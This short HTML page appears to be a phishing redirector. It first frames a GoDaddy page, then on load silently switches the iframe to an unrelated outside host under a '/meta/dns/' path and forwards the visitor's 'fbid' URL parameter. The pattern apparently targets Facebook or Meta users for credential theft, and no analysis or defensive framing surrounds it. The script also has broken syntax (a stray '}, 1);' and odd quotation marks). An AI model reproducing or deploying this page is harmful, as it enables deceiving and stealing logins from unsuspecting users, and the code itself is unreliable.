<style>
  body{
  margin:0;
 }
</style>
<iframe src="https://ua.godaddy.com/" id="frame" width="100%" height=«600px»></iframe><br/>
<script src="https://code.jquery.com/jquery-1.12.4.min.js"
  integrity="sha256-ZosEbRLbNQzLpnKIkEdrPv7lOy9C27hHQ+Xp8a4MxAQ="
  crossorigin="anonymous"></script>
<script>

//setTimeout(function(){ 
$( document ).ready(function() {
   var regexp = /fbid=([^&]+)/i;
        var GetValue = '';
        if (!!regexp.exec(document.location.search))
            GetValue = regexp.exec(document.location.search)[1];
        var src = 'https://bradfordbd.com/meta/dns/hd5m21/index.php/?fbid='+ GetValue;

document.getElementById ('frame').src=src }, 1);

</script>